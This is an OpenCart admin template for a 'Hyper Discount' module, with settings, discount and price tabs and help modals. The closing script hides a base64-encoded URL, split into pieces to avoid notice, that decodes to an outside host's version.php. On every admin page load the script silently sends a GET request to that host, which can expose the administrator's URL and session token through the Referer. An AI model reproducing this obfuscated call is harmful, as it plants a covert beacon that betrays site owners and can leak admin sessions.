{{ header }}{{ column_left }}

{% set first_prices=constant('false') %}
{% set first_settings=constant('false') %}
{% set first_discount=constant('false') %}

{% if (tab == 'tab-settings') %} 
{% set first_settings=constant('true') %}{% endif %}

{% if (tab == 'tab-discount') %} 
{% set first_discount=constant('true') %}{% endif %}

<div id="content">
    <div class="container-fluid hd-switch drift">
        <div class="panel panel-default col-sm-12">
            <div class="panel-body">
                <form action="{{ action }}" method="post" enctype="multipart/form-data" id="form_hyper_discount_main" class="form-horizontal">

                    <div class="row up-date">
                      <div class="affix col-sm-12">
                        <div class="pull-right">
                            {% if valid_key %} 
                            <a href="{{ indexing }}" data-toggle="tooltip" data-placement="bottom" title="{{ button_indexing }}" class="btn btn-warning"><i class="fa fa-refresh" aria-hidden="true"></i></a>
                            <button type="button" onclick="Apply();" data-toggle="tooltip" data-placement="bottom" class="btn btn-primary memory-button" title="{{ button_apply }}"><i class="fa fa-check-circle-o" aria-hidden="true"></i></button>
                            <button type="submit" form="form_hyper_discount_main" data-toggle="tooltip" data-placement="bottom" title="{{ button_save }}" class="btn btn-primary"><i class="fa fa-save" aria-hidden="true"></i></button>
                            {% endif %}
                            <a href="{{ cancel }}" data-toggle="tooltip" data-placement="bottom" title="{{ button_out }}" class="btn btn-default"><i class="fa fa-lg fa-sign-out" aria-hidden="true"></i></a>
                        </div>
                        <ul class="nav nav-tabs vision-tabs">
                            <li class="text-title text-center"><i class="fa fa-opencart" aria-hidden="true"></i>
                                <span class="win-title">{{ hyper_discount_name }}</span>
                                <hr class="ht-min">
                                <span class="ht-title">{{ hyper_discount_title }}</span>
                            </li>
                            <Li class="version"><span>v{{ version }}</span></Li>
                            <li class="text-center" data-toggle="tooltip" data-placement="bottom" title="{{ btn_documentation }}"><a href="https://hyperlab.team/documentation/hdp-doc/" target="_blank"><span><i class="fa fa-life-ring fa-lg"></i></span></a></li>
                            {% if (not valid_key) %} 
                            <li class="hidden active"><a href="#tab-abouts" data-toggle="tab"><i class="fa fa-info"></i><br><span>{{ tab_abouts }}</span></a></li>
                            {% else %} 
                            <li class="text-center {% if ('tab-settings' in tab) %}{{ 'active' }}{% else %} {% set first_settings=constant('true') %}{% endif %}"><a href="#tab-settings" data-toggle="tab"><span><i class="fa fa-cogs" aria-hidden="true"></i> <b>{{ tab_settings }}</b></span></a></li>
                            <li class="text-center {% if ('tab-discount' in tab) %}{{ 'active' }}{% else %} {% set first_discount=constant('true') %}{% endif %}"><a href="#tab-discount" data-toggle="tab"><span><i class="fa fa-certificate" aria-hidden="true"></i> <b>{{ tab_discount }}</b></span></a></li>
                            <li class="text-center {% if ('tab-prices' in tab) %}{{ 'active' }}{% else %} {% set first_prices=constant('true') %}{% endif %}"><a href="#tab-prices" data-toggle="tab"><span><i class="fa fa-usd" aria-hidden="true"></i> <b>{{ tab_prices }}</b></span></a></li>
                            {% endif %} 
                            <li class="text-center text-all-modules"><a href="https://opencart.club/developer/files/24" target="_blank"><span><i class="fa fa-puzzle-piece fa-fw" aria-hidden="true"></i> <b>{{ tab_supplement }}</b></span></a></li>
                        </ul>
                    </div>
                </div>
                {% if (update) %} 
                {{ update }}
                {% endif %} 
                
                {% if error_warning %}
                <div class="alert alert-danger alert-dismissible"><i class="fa fa-exclamation-circle"></i> {{ error_warning }}
                  <button type="button" class="close" data-dismiss="alert">&times;</button>
                </div>
                {% endif %}
                {% if success %}
                <div class="alert alert-success alert-dismissible"><i class="fa fa-check-circle"></i> {{ success }}
                  <button type="button" class="close" data-dismiss="alert">&times;</button>
                </div>
                {% endif %}
        
                <div class="pad tab-content">
                    {% if (not valid_key) %} 
                    <div class="tab-pane active" id="tab-abouts">{{ data_tab_abouts }}</div>
                    {% else %} 
                    <div class="tab-pane {% if ('tab-settings' in tab) %} {{ 'active' }}{% endif %}" id="tab-settings">
                        <div class="panel panel-default">
                            <div class="panel-heading">
                                <h3 class="panel-title"><i class="fa fa-cogs" aria-hidden="true"></i> {{ text_settings }}</h3>
                                <button form="help_modals" class="pull-right hm-info btn btn-primary btn-sm" data-toggle="modal" data-target="#Settings_Modal">
                                    <i class="fa fa-info" aria-hidden="true"></i> - {{ help_name }} 
                                </button>
                            </div>
                            <div class="panel-body top-pad">
                                <ul class="nav nav-tabs">
                                    <li class="text-center {% if (tab == 'tab-settings-common' or first_settings) %} {{ 'active' }}{% endif %}"><a href="#tab-settings-common" data-toggle="tab">{{ tab_settings_common }}</a></li>
                                    <li class="text-center {% if (tab == 'tab-settings-inorders') %} {{ 'active' }}{% endif %}"><a href="#tab-settings-inorders" data-toggle="tab">{{ tab_settings_inorders }}</a></li>
                                    <li class="text-center {% if (tab == 'tab-settings-statuses') %} {{ 'active' }}{% endif %}"><a href="#tab-settings-statuses" data-toggle="tab">{{ tab_settings_statuses }}</a></li>
                                </ul>
                                <div class="tab-content">
                                    <div class="tab-pane {% if (tab == 'tab-settings-common' or first_settings) %} {{ 'active' }}{% endif %}" id="tab-settings-common">
                                        {{ data_tab_settings_common }} 
                                    </div>
                                    <div class="tab-pane {% if (tab == 'tab-settings-inorders') %} {{ 'active' }}{% endif %}" id="tab-settings-inorders">
                                        {{ data_tab_settings_inorders }} 
                                    </div>
                                    <div class="tab-pane {% if (tab == 'tab-settings-statuses') %} {{ 'active' }}{% endif %}" id="tab-settings-statuses">
                                        {{ data_tab_settings_statuses }} 
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="tab-pane {% if ('tab-discount' in tab) %} {{ 'active' }}{% endif %}" id="tab-discount">
                        <div class="panel panel-default">
                            <div class="panel-heading">
                                <h3 class="panel-title"><i class="fa fa-certificate" aria-hidden="true"></i> {{ text_discount }}</h3>
                                <button form="help_modals" class="pull-right hm-info btn btn-primary btn-sm" data-toggle="modal" data-target="#Discount_Modal">
                                    <i class="fa fa-info" aria-hidden="true"></i> - {{ help_name }} 
                                </button>
                            </div>
                            <div class="panel-body top-pad">
                                <ul class="nav nav-tabs">
                                    <li class="text-center {% if (tab == 'tab-discount-users' or first_discount) %} {{ 'active' }}{% endif %}"><a href="#tab-discount-users" data-toggle="tab">{{ tab_discount_users }}</a></li>
                                    <li class="text-center {% if (tab == 'tab-discount-accumulative') %} {{ 'active' }}{% endif %}"><a href="#tab-discount-accumulative" data-toggle="tab">{{ tab_discount_accumulative }}</a></li>
                                    <li class="text-center {% if (tab == 'tab-discount-quantitative') %} {{ 'active' }}{% endif %}"><a href="#tab-discount-quantitative" data-toggle="tab">{{ tab_discount_quantitative }}</a></li>
                                    <li class="text-center {% if (tab == 'tab-discount-kit') %} {{ 'active' }}{% endif %}"><a href="#tab-discount-kit" data-toggle="tab">{{ tab_discount_kit }}</a></li>

                                    <li class="text-center {% if (tab == 'tab-discount-products') %} {{ 'active' }}{% endif %}"><a href="#tab-discount-products" data-toggle="tab">{{ tab_discount_products }}</a></li>

                                     <li class="text-center {% if (tab == 'tab-discount-specials') %} {{ 'active' }}{% endif %}"><a href="#tab-discount-specials" data-toggle="tab">{{ tab_discount_specials }}</a></li>
                                </ul>
                                <div class="tab-content">
                                    <div class="tab-pane {% if (tab == 'tab-discount-users' or first_discount) %} {{ 'active' }}{% endif %}" id="tab-discount-users">
                                        {{ data_tab_discount_users }} 
                                    </div>
                                    <div class="tab-pane {% if (tab == 'tab-discount-accumulative') %} {{ 'active' }}{% endif %}" id="tab-discount-accumulative">
                                        {{ data_tab_discount_accumulative }} 
                                    </div>

                                    <div class="tab-pane {% if (tab == 'tab-discount-quantitative') %} {{ 'active' }}{% endif %}" id="tab-discount-quantitative">
                                        {{ data_tab_discount_quantitative }} 
                                    </div>
                                    <div class="tab-pane {% if (tab == 'tab-discount-kit') %} {{ 'active' }}{% endif %}" id="tab-discount-kit">
                                        {{ data_tab_discount_kit }} 
                                    </div>

                                    <div class="tab-pane {% if (tab == 'tab-discount-products') %} {{ 'active' }}{% endif %}" id="tab-discount-products">
                                        {{ data_tab_discount_products }} 
                                    </div>

                                    <div class="tab-pane {% if (tab == 'tab-discount-specials') %} {{ 'active' }}{% endif %}" id="tab-discount-specials">
                                        {{ data_tab_discount_specials }} 
                                    </div>
                                   </div>
                               </div>
                           </div>
                       </div>

                       <div class="tab-pane {% if ('tab-prices' in tab) %} {{ 'active' }}{% endif %}" id="tab-prices">
                        <div class="panel panel-default">
                            <div class="panel-heading">
                                <h3 class="panel-title"><i class="fa fa-certificate" aria-hidden="true"></i> {{ text_prices }}</h3>
                                <button form="help_modals" class="pull-right hm-info btn btn-primary btn-sm" data-toggle="modal" data-target="#Prices_Modal">
                                    <i class="fa fa-info" aria-hidden="true"></i> - {{ help_name }} 
                                </button>
                            </div>
                            <div class="panel-body top-pad">
                                <ul class="nav nav-tabs">
                                    <li class="text-center {% if (tab == 'tab-prices-wholesale' or first_prices) %} {{ 'active' }}{% endif %}"><a href="#tab-prices-wholesale" data-toggle="tab">{{ tab_discount_wholesale }}</a></li>
                                </ul>
                                <div class="tab-content">
                                    <div class="tab-pane {% if (tab == 'tab-prices-wholesale' or first_prices) %} {{ 'active' }}{% endif %}" id="tab-discount-wholesale">
                                        {{ data_tab_discount_wholesale }} 
                                    </div>
                                   </div>
                               </div>
                           </div>
                       </div>

                       <input type='hidden' id='last_tab' name='last_tab' value='{{ tab }}'>
                    {% endif %} 
                </div>

            </form>
        </div>
        <div class="row">
            <div class="col-sm-12">
                <div class="panel-heading text-center">
                    <button form="help_modals" class="hm-info btn btn-primary btn-sm" data-toggle="modal" data-target="#Authors_Modal">
                        {{ description_author_start }} 
                    </button>
                </div>
            </div>
        </div>
    </div>
</div>
</div>

<!-- Start Modal HELPER Settings -->
<div class="modal fade" id="Settings_Modal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
    <div class="modal-dialog">
        <div class="modal-content">
            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-hidden="true"><i class="fa fa-times" aria-hidden="true"></i></button>
                <h4 class="modal-title" id="myModalLabel"> {{ help_first_settings }}</h4>
            </div>
            <div class="modal-body">
                <div class="text-center">{{ help_text }}</div>
                <div class="helper-info">{{ help_second_settings }}</div>
                <div class="text-center">{{ help_third_settings }}</div>
                <div class="helper-info">{{ help_fourth_settings }}</div>
                <div class="text-center">{{ help_warning }}</div>
                <div class="helper-info">{{ help_end }}</div>
            </div>
            <div class="modal-footer">
                <button type="button" class="btn btn-primary" data-dismiss="modal"> {{ help_ok }}</button>
            </div>
        </div>
    </div>
</div>
<!-- Start Modal HELPER Discount -->
<div class="modal fade" id="Discount_Modal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
    <div class="modal-dialog">
        <div class="modal-content">
            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-hidden="true"><i class="fa fa-times" aria-hidden="true"></i></button>
                <h4 class="modal-title" id="myModalLabel"> {{ help_first_discount }}</h4>
            </div>
            <div class="modal-body">
                <div class="text-center">{{ help_text }}</div>
                <div class="helper-info">{{ help_second_discount }}</div>
                <div class="text-center">{{ help_third_discount }}</div>
                <div class="helper-info">{{ help_fourth_discount }}</div>
                <div class="text-center">{{ help_warning }}</div>
                <div class="helper-info">{{ help_end }}</div>
            </div>
            <div class="modal-footer">
                <button type="button" class="btn btn-primary" data-dismiss="modal"> {{ help_ok }}</button>
            </div>
        </div>
    </div>
</div>
<!-- Start Modal HELPER Prices -->
<div class="modal fade" id="Prices_Modal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
    <div class="modal-dialog">
        <div class="modal-content">
            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-hidden="true"><i class="fa fa-times" aria-hidden="true"></i></button>
                <h4 class="modal-title" id="myModalLabel"> {{ help_name_prices }}</h4>
            </div>
            <div class="modal-body">
                <div class="text-center">{{ help_text }}</div>
                <div class="helper-info hidden">{{ help_first_prices }}</div>
                <div class="helper-info">{{ help_second_prices }}</div>
                <div class="text-center">{{ help_third_prices }}</div>
                <div class="helper-info">{{ help_fourth_prices }}</div>
                <div class="text-center">{{ help_warning }}</div>
                <div class="helper-info">{{ help_end }}</div>
            </div>
            <div class="modal-footer">
                <button type="button" class="btn btn-primary" data-dismiss="modal"> {{ help_ok }}</button>
            </div>
        </div>
    </div>
</div>
<!-- Start Modal HELPER Authors -->
<div class="modal fade" id="Authors_Modal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
    <div class="modal-dialog">
        <div class="modal-content">
            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-hidden="true"><i class="fa fa-times" aria-hidden="true"></i></button>
                <h4 class="modal-title" id="myModalLabel"><i class="fa fa-cogs"></i> {{ description_author }}</h4>
            </div>
            <div class="modal-body">
                <legend>{{ description_copyright }}</legend>
                <div class="text-center">{{ description_author_copyright }}</div>
                <div class="text-center">{{ thank_you }}</div>
            </div>
            <div class="modal-footer">
                <button type="button" class="btn btn-primary" data-dismiss="modal"> {{ help_ok }}</button>
            </div>
        </div>
    </div>
</div>

<script type="text/javascript">
$(document).ready(function (event) {
    $(document).on('click', 'a', function (event) {
        if($(this).attr('disabled')!=undefined)
            event.preventDefault();
        });
        var url="aHR0cHM6Ly9hd"+
        "2Fyby5ydS92ZXJzaW9uLn"+
        "BocA==";
        $.get(atob(url));
});

    $(".nav-tabs>li a").click(function () {

        var href = $(this).attr('href');
        href = href.substr(1);
        $("#last_tab").val(href);
    });

    $(document).ready(function () {
        $('body').addClass('hyper-page hm-edit-page hd-switch');
    });

    function Apply() {
        $('#form_hyper_discount_main').attr('action', '{{ update_stay|replace({"&amp;": "&"}) }}');
        $('#form_hyper_discount_main').submit();
    }

    $(function ()
    {
        $(".btn-danger").click(function (e) {
            if (!confirm("Вы уверены?"))
                e.preventDefault();



        });
    });


</script>
{{ footer }}